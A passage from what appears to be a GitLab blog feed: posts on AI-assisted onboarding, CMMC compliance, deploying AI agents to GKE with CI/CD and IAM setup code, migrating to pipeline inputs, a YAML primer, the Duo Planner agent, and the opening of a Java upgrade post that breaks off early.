They are free to use during the beta period, and when generally available, they are planned to be made available with a paid add-on option for GitLab Duo Agent Platform._ ### Stay up to date with GitLab To make sure you’re getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade: * Upgrade Path Tool — enter your current version and see the exact upgrade steps for your instance * Upgrade Documentation — detailed guides for each supported version, including requirements, step-by-step instructions, and best practices By upgrading regularly, you’ll ensure your team benefits from the newest GitLab capabilities and remains secure and supported. For organizations that want a hands-off approach, consider GitLab’s Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information. _This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
November 20, 2025 at 10:24 PM
GitLab engineer: How I improved my onboarding experience with AI
Starting a new job is exciting, and overwhelming. New teammates, new tools, and, in GitLab’s case, a lot of documentation. Six weeks ago, I joined GitLab’s Growth team as a fullstack engineer. Anyone who has gone through onboarding at GitLab knows it’s transparent, extensive, and thorough. GitLab's onboarding process includes a lot of docs, videos, and trainings that will bring you up to speed. Also, in line with GitLab's values, my team encouraged me to start contributing right away. I quickly realized that onboarding here is both diligent and intense. Luckily, I had a secret helper: GitLab Duo.

## My main use cases

I’ve found GitLab Duo's AI assistance, available throughout the software development lifecycle, useful in three key areas: exploration, reviewing, and debugging. With GitLab Duo, I was able to get my first tiny MR deployed to production in the first week and actively contribute to the personal homepage in GitLab 18.5 in the weeks after.

### Exploration

Early in onboarding, I often remembered reading something but couldn’t recall where. GitLab has a public-facing handbook, an internal handbook, and GitLab Docs. It can be difficult to search across all of them efficiently. GitLab Duo simplifies this task: I can describe what I’m looking for in natural language via GitLab Duo Chat and search across all resources at once.

Example prompt:

> I remember reading about how RSpec tests are done at GitLab. Can you find relevant documentation across the Handbook, the internal handbook and the GitLab Docs?

Before starting work on an issue, I use GitLab Duo to identify edge cases and hidden dependencies. GitLab Duo weighs the issue's requirements against the whole GitLab codebase, assesses similar features, and prepares its findings. Based on its output, I can refine the issue with my product manager and designer, make sure my implementation covers all edge cases, or define future iterations.

Example prompt:

> Analyze this issue in the context of its epic and identify:
>
> * Implementation questions to ask PM/design before coding
> * Edge cases not covered in requirements
> * Cross-feature dependencies that might be affected
> * Missing acceptance criteria

I also check that my planned solution follows GitLab best practices and common patterns.

Example prompt:

> I want to implement XYZ behavior — how is this usually done at GitLab, and what other options do I have?

### Reviewing

I always let GitLab Duo review my merge requests before assigning human reviewers. It often catches small mistakes, suggests improvements, and highlights edge cases I missed. This shortens the review cycle and helps my teammates focus on more complex and bigger-picture feedback.

Since I’m still new to GitLab’s codebase and coding practices, some review comments are hard to interpret. In those cases, GitLab Duo helps me understand what a reviewer means and how it relates to my code.

Example prompt:

> I don’t understand the comment on this MR about following the user instead of testing component internals. What does it mean, and how does it relate to my implementation?

### Debugging

Sometimes pipeline tests on my merge requests fail unexpectedly. If I can’t tell whether my changes are the cause, GitLab Duo helps me investigate and fix the failures. Using GitLab Duo Agentic Chat, Duo can apply changes to debug the failing job.

Example prompt:

> The pipeline job “rspec system pg16 12/32” is failing, but I don’t know whether that relates to my changes.
> Can you check whether my changes are causing the pipeline failure and, if so, guide me through the steps of fixing it?

## How Duo aligns with GitLab’s values

Using GitLab Duo doesn’t just help me; it also supports GitLab’s CREDIT values:

* **Collaboration:** I ask teammates fewer basic questions. And when I do ask questions, they’re more thoughtful and informed. This respects their time.
* **Results for customers:** By identifying edge cases early and improving code quality, GitLab Duo helps me deliver better outcomes for customers.
* **Efficiency:** Streamlined preparation, faster reviews, and improved debugging make me more efficient.
* **Diversity, inclusion & belonging:** AI guidance can mitigate misunderstandings and lower barriers to entry for people with differing backgrounds and abilities.
* **Iteration:** The ability to try ideas faster and identify potential improvements enables faster iteration.
* **Transparency:** GitLab Duo makes the already transparent documentation at GitLab more accessible.

## Staying cautious with AI

It has never been so easy, and at the same time so difficult, to be competent as in the age of AI. AI can be a powerful tool, but it does get things wrong. Therefore, I avoid automation bias by always validating AI's outputs. If I don’t understand the output, I don’t use it. I’m also cautious of over-reliance. Studies suggest that heavy AI use can lead to cognitive offloading and worse outcomes in the long run. One study shows that users of AI perform worse in exams. To avoid negatively affecting my skills, I use AI as a discussion partner rather than just implementing the code it generates.

## Summary

Onboarding is always a stressful time, but using GitLab Duo made mine smoother and less overwhelming. I learned more about GitLab’s codebase, culture, and best practices than I could have managed on my own.

> Want to make GitLab Duo part of your onboarding experience? Sign up for a free trial today.

## Resources

* Getting started with GitLab Duo
* Get started with GitLab Duo Agentic Chat in the web UI
* 10 best practices for using AI-powered GitLab Duo Chat
about.gitlab.com
November 17, 2025 at 10:24 PM
Achieve CMMC Level 2 with GitLab Dedicated for Government
For Defense Industrial Base (DIB) companies, the U.S. Department of Defense's release of the Cybersecurity Maturity Model Certification (CMMC) Final Rule and new guidance on “FedRAMP equivalency” has dramatically increased the cost of compliance and fundamentally changed the way in which they drive their risk management programs. Gone is the era of “self-attestation” of security programs; DIB companies are required to strictly apply NIST 800-171 to their environments that handle Controlled Unclassified Information (CUI), and have their security controls audited by a Third-Party Assessment Organization (3PAO) every three years. DIB companies are engineering focused, not compliance driven, and formal audits get pricey quickly. These changes add significant complications for companies focused on supporting the warfighter. The good news? GitLab Dedicated for Government's FedRAMP Moderate Authorization means DIB companies can directly use GitLab Dedicated for Government with no additional audits or authorizations, which reduces the impact and cost of compliance. ## The foundational rule: FedRAMP Moderate Equivalency The protection of Controlled Unclassified Information (CUI) within the DIB is driven by a foundational legal and contractual mandate: the Defense Federal Acquisition Regulation Supplement (DFARS) Clause 252.204-7012. This clause specifically states that if a contractor uses an external cloud service provider to "store, process, or transmit any covered defense information," that provider must meet security requirements "equivalent to those established by the Government for the FedRAMP Moderate baseline." The DOD's January 2, 2024, memorandum, "Federal Risk and Authorization Management Program (FedRAMP) Moderate Equivalency for Cloud Service Provider's (CSPs) Cloud Service Offerings" defines “FedRAMP Moderate Equivalency,” and also directly specifies that FedRAMP Moderate Cloud Service Offerings (CSOs) can be used without any additional assessment, such as individual CMMC assessment, to meet equivalency requirements: “This memorandum does not apply to CSOs that are FedRAMP Moderate Authorized under the existing FedRAMP process. **FedRAMP Moderate Authorized CSOs identified in the FedRAMP Marketplace** provide the required security to store, process or transmit CDI in accordance with Defense Federal Acquisition Regulations Supplement (DFARS) Clause 252.204-7012, "Safeguarding Covered Defense Information and Cyber Incident Reporting" and **can be leveraged without further assessment to meet the equivalency requirements**.” ## The GitLab platform: A proven path to compliance GitLab's GovCloud Offering, GitLab Dedicated for Government, has achieved FedRAMP Moderate Authorization. This means that DIB companies can leverage GitLab Dedicated for Government as their DevSecOps platform immediately and without any additional audits or compliance checks. DIB companies leveraging GitLab Dedicated for Government inherit all of our security controls and our Body of Evidence, shifting the risk and cost of compliance away from themselves and allowing them to focus on their mission. ## The Shared Responsibility Matrix: Your role as a DIB contractor While a FedRAMP-authorized solution significantly reduces your compliance burden, compliance is a joint effort. You are responsible for the security controls that fall under your purview. This is where the Shared Responsibility Matrix (SRM), also called the Customer Responsibility Matrix (CRM), comes in. 
When you adopt GitLab Dedicated for Government, you will receive a comprehensive SRM that clearly delineates which security controls are managed by GitLab and which are your responsibility as the customer. Your CMMC C3PAO will use this document to ensure you have implemented the necessary controls on your end.

By leveraging GitLab's FedRAMP-authorized platform, you can confidently address your CMMC Level 2 compliance requirements, focusing on your mission while trusting that GitLab has you covered.

> To learn more about GitLab Dedicated for Government, visit our GitLab for Public Sector page. Interested in a demo? Contact Sales for more information at [email protected].

## References

* CMMC "Final Rule" DFARS Supplement
* DOD-CIO "FedRAMP Moderate Equivalency" Memo
* GitLab Dedicated for Government FedRAMP Marketplace Listing
about.gitlab.com
November 12, 2025 at 10:22 PM
Secure AI agent deployment to GKE
Building AI agents is exciting, but deploying them securely to production shouldn't be complicated. In this tutorial, you will learn how GitLab's native Google Cloud integration makes it straightforward to deploy AI agents to Google Kubernetes Engine (GKE) — with built-in scanning and zero service account keys.

## Why choose GKE to deploy your AI agents?

GKE provides enterprise-grade orchestration that connects seamlessly with GitLab CI/CD pipelines through OIDC authentication. Your development team can deploy AI agents while maintaining complete visibility, compliance, and control over your cloud infrastructure. This guide uses Google's Agent Development Kit (ADK) to build the app, which then deploys smoothly through GitLab.

There are three key advantages to this approach:

**Full infrastructure control** - Your data, your rules, your environment. You maintain complete control over where your AI agents run and how they're configured.

**Native GitLab integration** - No complex workarounds. Your existing pipelines work right out of the box thanks to GitLab's native integration with Google Cloud.

**Production-grade scaling** - GKE automatically handles the heavy lifting of scaling and internal orchestration as your AI workloads grow.

The key point is that GitLab with GKE provides the enterprise reliability your AI deployments demand without sacrificing the developer experience your teams expect.

## Prerequisites

Before you start, make sure you have these APIs enabled:

* GKE API
* Artifact Registry API
* Vertex AI API

Also make sure you have:

* A GitLab project created
* A GKE cluster provisioned
* An Artifact Registry repository created

## The deployment process

### 1. Set up IAM and permissions on GitLab

Navigate to your GitLab integrations to configure Google Cloud authentication (IAM). Go to **Settings > Integrations** and configure the Google Cloud integration. If you're using a group-level integration, note that default settings are inherited by projects: you configure once at the group level, and all projects inherit the setting.

To set this up from scratch, provide:

* Project ID
* Project Number
* Workload Identity Pool ID
* Provider ID

Once configured, GitLab provides a script to run in the Google Cloud Console via Cloud Shell. Running this script creates a Workload Identity Federation pool with the service principal needed to enable the proper access.

### 2. Configure Artifact Registry integration

Still in GitLab's integration settings, configure Artifact Management:

1. Click **Artifact Management**.
2. Select **Google Artifact Registry**.
3. Provide:
   * Project ID
   * Repository Name (created beforehand)
   * Repository Location

GitLab provides another script to run in the Google Cloud Console.

**Important:** Before proceeding, add these extra roles to the Workload Identity Federation pool:

* Service Account User
* Kubernetes Developer
* Kubernetes Cluster Viewer

These permissions allow GitLab to deploy to GKE in the subsequent steps.

### 3. Create the CI/CD pipeline

Now for the key part — creating the CI/CD pipeline for deployment. Head to **Build > Pipeline Editor** and define your pipeline with four stages:

* **Build** - Docker creates the container image.
* **Test** - GitLab Auto DevOps provides built-in security scans to check for vulnerabilities.
* **Upload** - Uses GitLab's built-in CI/CD component to push to Google Artifact Registry.
* **Deploy** - Uses a Kubernetes configuration to deploy to GKE.
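Before looking at the full file, one detail is worth highlighting: the deploy job authenticates to Google Cloud with the `identity` keyword, which exchanges the CI job's OIDC token through the Workload Identity Federation pool configured earlier. This is what makes the "zero service account keys" claim work. A minimal sketch of just that piece (the job body here is illustrative, not the final configuration):

```yaml
deploy:
  stage: deploy
  image: google/cloud-sdk:slim
  # Federates the job's OIDC token to Google Cloud -- no JSON key files needed
  identity: google_cloud
  script:
    - gcloud auth list  # shows the federated identity GitLab provided
```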
Here's the complete `.gitlab-ci.yml`:

```yaml
default:
  tags: [ saas-linux-2xlarge-amd64 ]

stages:
  - build
  - test
  - upload
  - deploy

variables:
  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA
  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA
  GCP_PROJECT_ID: "your-project-id"
  GKE_CLUSTER: "your-cluster"
  GKE_REGION: "us-central1"
  KSA_NAME: "ai-agent-ksa"

build:
  image: docker:24.0.5
  stage: build
  services:
    - docker:24.0.5-dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker build -t $GITLAB_IMAGE .
    - docker push $GITLAB_IMAGE

include:
  - template: Jobs/Dependency-Scanning.gitlab-ci.yml
  - template: Jobs/Container-Scanning.gitlab-ci.yml
  - template: Jobs/Secret-Detection.gitlab-ci.yml
  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main
    inputs:
      stage: upload
      source: $GITLAB_IMAGE
      target: $AR_IMAGE

deploy:
  stage: deploy
  image: google/cloud-sdk:slim
  identity: google_cloud
  before_script:
    - apt-get update && apt-get install -y kubectl google-cloud-sdk-gke-gcloud-auth-plugin
    - gcloud container clusters get-credentials $GKE_CLUSTER --region $GKE_REGION --project $GCP_PROJECT_ID
  script:
    - |
      kubectl apply -f - <<EOF
      apiVersion: apps/v1
      kind: Deployment
      metadata:
        name: ai-agent
        namespace: default
      spec:
        replicas: 2
        selector:
          matchLabels:
            app: ai-agent
        template:
          metadata:
            labels:
              app: ai-agent
          spec:
            serviceAccountName: $KSA_NAME
            containers:
            - name: ai-agent
              image: $AR_IMAGE
              ports:
              - containerPort: 8080
              resources:
                requests: {cpu: 500m, memory: 1Gi}
                limits: {cpu: 2000m, memory: 4Gi}
              livenessProbe:
                httpGet: {path: /health, port: 8080}
                initialDelaySeconds: 60
              readinessProbe:
                httpGet: {path: /health, port: 8080}
                initialDelaySeconds: 30
      ---
      apiVersion: v1
      kind: Service
      metadata:
        name: ai-agent-service
        namespace: default
      spec:
        type: LoadBalancer
        ports:
        - port: 80
          targetPort: 8080
        selector:
          app: ai-agent
      ---
      apiVersion: autoscaling/v2
      kind: HorizontalPodAutoscaler
      metadata:
        name: ai-agent-hpa
        namespace: default
      spec:
        scaleTargetRef:
          apiVersion: apps/v1
          kind: Deployment
          name: ai-agent
        minReplicas: 2
        maxReplicas: 10
        metrics:
        - type: Resource
          resource:
            name: cpu
            target: {type: Utilization, averageUtilization: 70}
      EOF
      kubectl rollout status deployment/ai-agent -n default --timeout=5m
      EXTERNAL_IP=$(kubectl get service ai-agent-service -n default -o jsonpath='{.status.loadBalancer.ingress[0].ip}')
      echo "Deployed at: http://$EXTERNAL_IP"
  only:
    - main
```

#### The critical configuration for GKE

What makes this work — and why GKE needs this extra configuration — is a Kubernetes Service Account in the cluster that is permitted to use the AI capabilities of Google Cloud. Without it, we can deploy the application, but the AI agent won't work. So we need to create a Kubernetes Service Account that can access Vertex AI.
Run this one-time setup:

```bash
#!/bin/bash
PROJECT_ID="your-project-id"
GSA_NAME="ai-agent-vertex"
GSA_EMAIL="${GSA_NAME}@${PROJECT_ID}.iam.gserviceaccount.com"
KSA_NAME="ai-agent-ksa"
CLUSTER_NAME="your-cluster"
REGION="us-central1"

# Create GCP Service Account
gcloud iam service-accounts create $GSA_NAME \
  --display-name="AI Agent Vertex AI" \
  --project=$PROJECT_ID

# Grant Vertex AI permissions
gcloud projects add-iam-policy-binding $PROJECT_ID \
  --member="serviceAccount:${GSA_EMAIL}" \
  --role="roles/aiplatform.user"

# Get cluster credentials
gcloud container clusters get-credentials $CLUSTER_NAME \
  --region $REGION --project $PROJECT_ID

# Create Kubernetes Service Account
kubectl create serviceaccount $KSA_NAME -n default

# Link accounts
kubectl annotate serviceaccount $KSA_NAME -n default \
  iam.gke.io/gcp-service-account=${GSA_EMAIL}

gcloud iam service-accounts add-iam-policy-binding ${GSA_EMAIL} \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:${PROJECT_ID}.svc.id.goog[default/${KSA_NAME}]" \
  --project=$PROJECT_ID
```

### 4. Deploy to GKE

Once you're done, commit and push your changes to trigger the pipeline. Go to **CI/CD > Pipelines** and you'll see the four stages run:

* Build
* Test (with all defined security scans)
* Upload to Artifact Registry
* Deploy to Kubernetes in GKE

## Summary

With GitLab and Google Cloud together, you can deploy your AI agent to GKE with ease and security. Thanks to GitLab's native integration with Google Cloud, it only takes a handful of steps.

Watch this demo:

<figure class="video_container">
  <iframe src="https://www.youtube.com/embed/mc2pCL5Qjus?si=QoH02lvz5KH5Ku9O" frameborder="0" allowfullscreen="true"></iframe>
</figure>

> Use this tutorial's complete code example to get started now. Not a GitLab customer yet? Explore the DevSecOps platform with a free trial. Startups hosted on Google Cloud get a special perk to try GitLab.
about.gitlab.com
November 10, 2025 at 10:23 PM
Migrate from pipeline variables to pipeline inputs for better security
Pipeline variables have long been a convenient way to customize GitLab CI/CD pipelines at runtime. However, as CI/CD security best practices have evolved, we've recognized the need for stronger controls around pipeline customization. Unrestricted pipeline variables allow any user with pipeline trigger permissions to override values without validation or type checking.

Beyond security considerations, pipeline variables lack proper documentation and explicit declaration, making it difficult to understand what inputs are expected and how they're used throughout your pipeline. This can lead to maintenance challenges and make it harder to establish proper governance over your CI/CD processes.

## Enter pipeline inputs

Instead of relying on pipeline variables, we strongly recommend using GitLab's pipeline inputs feature. Pipeline inputs provide:

* **Explicit declaration**: Inputs must be explicitly declared in your `.gitlab-ci.yml` and are self-documented.
* **Type safety**: Support for different input types (string, boolean, number, array)
* **Built-in validation**: Automatic validation of input values
* **Better security**: No risk of variable injection attacks — only the declared inputs can be passed from the outside

### Basic example

```yaml
spec:
  inputs:
    deployment_env:
      description: "Target deployment environment"
      type: string
      options: ["staging", "production"]
      default: "staging"
    enable_tests:
      description: "Run test suite"
      type: boolean
      default: true
---
test:
  script:
    - echo "Running tests"
  rules:
    - if: $[[ inputs.enable_tests ]] == true

deploy:
  script:
    - echo "Deploying to $[[ inputs.deployment_env ]]"
```

Learn more about how CI/CD inputs provide type-safe parameter passing with validation in this tutorial.

## Restrict pipeline variables

To effectively move to pipeline inputs and away from pipeline variables, you should configure the **Minimum role to use pipeline variables** setting. This setting provides fine-grained control over which roles can use pipeline variables when triggering pipelines.

**At the project level:** Navigate to your project's **Settings > CI/CD > Variables > Minimum role to use pipeline variables** to configure the setting. Available options are:

* **No one allowed** (`no_one_allowed`) - Recommended and most secure option. Prevents all variable overrides.
* **Developer** (`developer`) - Allows developers and above to override variables
* **Maintainer** (`maintainer`) - Requires the Maintainer role or higher
* **Owner** (`owner`) - Only project owners can override variables

**At the group level:** Group maintainers can go to **Settings > CI/CD > Variables > Default role to use pipeline variables** to establish secure defaults for all new projects within their group, ensuring consistent security policies across your organization. Here, too, we recommend **No one allowed** as the default value — this way, new projects in the group are created with a secure default setting. Note that this still allows project owners to change the setting.

When pipeline variables are restricted completely (with **No one allowed**), the prefilled variables won't appear in the "New pipeline" form in the UI.

## How to migrate from pipeline variables

### Close the gaps

Your group may have projects that have pipeline variables enabled by default despite never having used them when triggering a pipeline. These projects can be migrated to the more secure setting without risk of interruption.
GitLab provides migration functionality via group settings:

* Go to **Settings > CI/CD > Variables**.
* In **Disable pipeline variables in projects that don't use them**, select **Start migration**.

This migration is a background job that safely disables pipeline variables via project settings for all projects that historically have not used them.

### Convert pipeline variables to inputs

For each identified pipeline variable, create a corresponding pipeline input.

**Before (using pipeline variables)**

```yaml
variables:
  DEPLOY_ENV:
    description: "Deployment environment"
    value: "staging"
  ENABLE_CACHE:
    description: "Enable deployment cache"
    value: "true"
  VERSION:
    description: "Application version"
    value: "1.0.0"

deploy:
  script:
    - echo "Deploying version $VERSION to $DEPLOY_ENV"
    - |
      if [ "$ENABLE_CACHE" = "true" ]; then
        echo "Cache enabled"
      fi
```

**After (using pipeline inputs)**

```yaml
spec:
  inputs:
    deploy_env:
      description: "Deployment environment"
      type: string
      default: "staging"
      options: ["dev", "staging", "production"]
    enable_cache:
      description: "Enable deployment cache"
      type: boolean
      default: true
    version:
      description: "Application version"
      type: string
      default: "1.0.0"
      regex: '^[0-9]+\.[0-9]+\.[0-9]+$'
---
deploy:
  script:
    - echo "Deploying version $[[ inputs.version ]] to $[[ inputs.deploy_env ]]"
    - |
      if [ "$[[ inputs.enable_cache ]]" = "true" ]; then
        echo "Cache enabled"
      fi
```

### Migrate trigger jobs

If you use trigger jobs with the `trigger` keyword, make sure they don't define job-level `variables`, and disable inheriting variables from top-level `variables`, `extends`, or `include`; otherwise, variables could implicitly be passed downstream as pipeline variables. If pipeline variables are restricted on the downstream project, pipeline creation will fail. Consider updating your CI/CD configuration to use pipeline inputs instead of pipeline variables:

```yaml
variables:
  FOO: bar

deploy-staging:
  inherit:
    variables: false  # otherwise FOO would be sent downstream as a pipeline variable
  trigger:
    project: myorg/deployer
    inputs:
      deployment_env: staging
      enable_tests: true
```

## Summary

Migrating from pipeline variables to pipeline inputs is a security enhancement that protects your CI/CD infrastructure from variable injection while providing better documentation, type safety, and validation. By implementing these restrictions and adopting pipeline inputs, you're not just improving security; you're also making your pipelines more maintainable, self-documenting, and resilient.

The transition requires some initial effort, but the long-term benefits far outweigh the migration costs. Start by restricting pipeline variables at the group level for new projects, then systematically migrate existing pipelines using the step-by-step approach outlined above.

Security is not a destination but a journey. Pipeline inputs are one important step toward a more secure CI/CD environment, complementing other GitLab security features like protected branches, job token allowlists, and container registry protections.

> To get started with pipeline inputs, sign up for a free trial of GitLab Ultimate today.
about.gitlab.com
November 4, 2025 at 10:21 PM
What is a YAML file? A complete guide from basics to practical use
YAML is a data serialization format used in Kubernetes manifests and Ansible playbooks. This article provides a detailed explanation of basic YAML file syntax and practical use cases.

What's covered:

* What is YAML?
* What is YAML used for?
* YAML vs. YML: What's the difference?
* YAML vs. JSON format differences
* YAML vs. CUE comparison
* YAML data structures and syntax (fundamentals)
* Using YAML in GitLab
* Let's edit a YAML file
* YAML FAQs

## What is YAML?

YAML is a data serialization language designed to express data concisely and understandably. It's frequently used for configuration files and data transfer. YAML is well suited to organizing hierarchical information and is often used as an alternative to JSON and XML.

## What is YAML used for?

Thanks to its easy readability, YAML is used for writing configuration files and playbooks. Here are some examples:

* Configuration file descriptions
* Log files
* Inter-process messaging
* Data sharing between applications
* Structured data descriptions

## YAML vs. YML: What's the difference?

Both refer to the same file format — the only difference is whether the extension is .yml or .yaml. While .yaml is the official extension for YAML files, extensions have traditionally been written in three characters (like .txt, .zip, .exe, .png), and .yml conforms to this three-character convention. Developers who prefer concise notation often choose .yml.

## YAML vs. JSON format differences

While JSON uses curly braces and brackets to define structure, YAML uses indentation, resulting in better readability. Comparing equivalent samples (see the sketch at the end of this section), you'll see that YAML prioritizes ease of use for programmers.

## YAML vs. CUE comparison

While YAML has high readability and a simple structure, CUE integrates schemas and data, allowing complex configurations to be managed in a single file. CUE also has schema validation functionality that YAML alone cannot achieve, making it easier to ensure data consistency. Flexibility is another major characteristic: CUE is an open source language (specifically, a superset of JSON) used to define, generate, and validate all kinds of data, so it can integrate with many other languages and formats like Go, JSON, OpenAPI, Protocol Buffers, and YAML. CUE also has scripting capabilities through the Go API, which comes in handy when rendering CUE-based manifests into final Kubernetes resource YAML or implementing commands to list resources for deployment to specific clusters.

## YAML data structures and syntax (fundamentals)

### Important notes for writing YAML files

Remember that indentation is extremely important: extra indentation can change the meaning of a YAML document. Also note that tabs are not allowed for indentation — use spaces.

### YAML data structures

YAML primarily consists of two types of data: collections and scalars. Collections are made up of sequences and mappings. Sequences are arrays, and mappings are name-value pairs (expressed as `key: value`). Scalars represent individual typed values such as strings and numbers.

* Collections
  * Sequences
  * Mappings
* Scalars

### Writing YAML syntax

* Literal blocks: Use the `|` (vertical bar) symbol when you need to preserve the line breaks of a multi-line value.
* Folded blocks: When you have long string values and want to write them across multiple lines that fold into a single line, use `>`.
* Lists: Lists are expressed using `-` (hyphens).
* Nesting: Nested data structures are expressed using indentation.

All of these constructs appear in the sketch below.
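To make the JSON comparison and the syntax rules above concrete, here is a small illustrative pair (the data itself is made up). The YAML version uses a mapping, a nested sequence, a `|` literal block, and a `>` folded block:

```yaml
server:
  name: web-01            # mapping: key-value pair
  tags:                   # sequence: a list, one item per hyphen
    - production
    - frontend
  description: |          # literal block: line breaks are preserved
    Primary web server.
    Handles public traffic.
  note: >                 # folded block: lines are joined with spaces
    This text is folded
    into a single line.
```

The equivalent JSON spells out the same structure with braces, brackets, and quoted strings:

```json
{
  "server": {
    "name": "web-01",
    "tags": ["production", "frontend"],
    "description": "Primary web server.\nHandles public traffic.\n",
    "note": "This text is folded into a single line.\n"
  }
}
```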
## Using YAML in GitLab

GitLab CI/CD pipelines use a YAML file called `.gitlab-ci.yml` in each project to define the pipeline structure and execution order. The configuration in this file is executed by GitLab Runner. For details, refer to the CI/CD YAML syntax reference.

## Let's edit a YAML file

Thanks to its simplicity and readability, YAML is widely used across various applications, including configuration files, CI/CD pipelines, container orchestration tools like Kubernetes, documentation, and configuration management. Its readability enables developers and operations engineers to easily manage configurations and data, allowing them to work efficiently. Understanding YAML will make configuring various systems and tools simpler and more intuitive.

## YAML FAQs

### What is YAML used for?

Thanks to its simplicity and readability, YAML is widely used across various applications, including configuration files, CI/CD pipelines, container orchestration tools like Kubernetes, documentation, and configuration management.

### What's the difference between YAML and JSON?

While JSON files use curly braces to define structure, YAML uses indentation, resulting in better readability. However, note that indentation and spacing are extremely important in YAML.

### Why is YAML popular?

YAML is a popular data serialization language among developers because of its readability, versatility, and use of an indentation system similar to Python's. YAML supports multiple data types and has parser libraries available for many programming languages, allowing it to handle various data serialization tasks and be used in a wide range of scenarios.
about.gitlab.com
October 31, 2025 at 10:24 PM
Ace your planning without the context-switching
Software development teams face a challenging balancing act: dozens of tasks, limited time, and constant pressure to pick the right thing to work on next. The planning overhead of structuring requirements, managing backlogs, tracking delivery, and writing status updates steals hours from strategic thinking. The result? Less time for the high-value decisions that actually drive products forward.

That's why we developed GitLab Duo Planner, an AI agent built on GitLab Duo Agent Platform to support product managers directly within GitLab. GitLab Duo Planner isn't another generic AI assistant. GitLab's product and engineering teams, who live these challenges daily like many of our customers, purpose-built GitLab Duo Planner to orchestrate planning workflows and reduce overhead while improving alignment and predictability.

## Your new planning teammate

Today's planning workflows face three major problems:

1. **Prone to drift** - Unplanned and orphaned work reduce trust in the plan.
2. **Disruptive to developers** - Constant interruptions for status updates break flow.
3. **Opaque** - Hidden risks surface too late to course-correct.

GitLab Duo Planner transforms the way teams work: It turns vague ideas into structured requirements in minutes, surfaces hidden backlog problems before they derail sprints, and applies RICE and MoSCoW frameworks instantly so you can make confident prioritization decisions. With awareness of GitLab context across the platform, every interaction with GitLab Duo Planner saves time and improves decision quality. This is possible because of the foundational agent architecture, which brings deep domain expertise and context awareness specific to GitLab.

## Built for teams

GitLab Duo Planner leverages work items (epics, issues, tasks) and understands the nuances of work breakdown structures, dependency analysis, and effort estimation, making it well positioned to improve visibility, alignment, and confidence in delivery.

* **Platform approach** - Unlike point solutions, Duo Planner orchestrates across your entire GitLab platform, from planning through development and testing, driving visibility across teams and workflows.
* **Embedded in the flow** - No more context-switching between tools or diving deep into GitLab to retrieve information. Duo Planner enables contributions, collaboration, and transparency from users across the software development lifecycle.
* **Saves time and effort** - Use Duo Planner to free your teams from repetitive coordination work, improving delivery predictability and reducing missed commitments while keeping the focus on what actually moves the needle.

## From chaos to clarity

GitLab Duo Planner can help at different stages of software planning and delivery while operating within the planning scope, providing a safe, bounded environment with project visibility.
The agent can help with six flows:

* **Prioritization** - Apply frameworks like RICE, MoSCoW, or WSJF to rank work items intelligently
* **Work breakdown** - Decompose initiatives into epics, features, and user stories to structure requirements
* **Dependency analysis** - Identify blocked work and understand relationships between items to maintain velocity
* **Planning** - Organize sprints, milestones, or quarterly planning
* **Status reporting** - Generate summaries of project progress, risks, and blockers to track delivery
* **Backlog management** - Identify stale issues, duplicates, or items needing refinement to improve data hygiene

Here is an example of how GitLab Duo Planner can check the status of an initiative:

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1131065078?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Duo Planner Agent"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Duo Planner is available as a custom agent in the Duo Chat side panel, with the current page context.

Let's ask Duo Planner about the status of an initiative by providing the epic link. We receive a structured summary with an overview, the current status of milestones, in-progress items, dependencies, and blockers, along with actionable recommendations.

Next, let's ask for an executive summary to share with stakeholders. GitLab Duo Planner eliminates hours of manual analysis and reporting effort, helping you make decisions faster and keep all stakeholders updated.

Here are a few more prompts you can try with GitLab Duo Planner:

* "Which of the bugs with a 'boards' label should we fix first, considering user impact?"
* "Rank these epics by strategic value for Q1."
* "Help me prioritize technical debt against new features."
* "What tasks are needed to implement this user story?"
* "Suggest a phased approach for this project: (insert URL)."

## What's next

GitLab Duo Planner focuses intentionally on product managers and engineering managers working in Agile environments. Why? Because specificity drives performance. By training Duo Planner deeply on GitLab's planning workflows and Agile frameworks, we deliver reliable, actionable insights rather than generic suggestions.

As we evolve the platform, we envision a family of specialized agents, each optimized for specific workflows while contributing to a unified intelligence layer. Today's planner for software teams is just the beginning of how AI will transform work prioritization across all teams.

> If you're an existing GitLab customer and would like to try GitLab Duo Planner with a prompt of your own, visit our documentation, where we cover prerequisites, use cases, and more.
about.gitlab.com
October 30, 2025 at 10:14 PM
Modernize Java applications quickly with GitLab Duo with Amazon Q
Upgrading applications to newer, supported versions of Java has traditionally been a tedious and time-consuming process. Development teams must spend countless hours learning about deprecated APIs, updated libraries, and new language features. In many cases, significant code rewrites are necessary, turning what should be a straightforward upgrade into a multi-week project that diverts resources from building new features.

GitLab Duo with Amazon Q changes this paradigm entirely with AI-powered automation. What once took weeks can now be accomplished in minutes, with full traceability and ready-to-review merge requests that maintain your application's functionality while leveraging modern Java features.

## How it works: Upgrade your Java application

Let's walk through how you can modernize a Java 8 application to Java 17.

**Start with an issue**

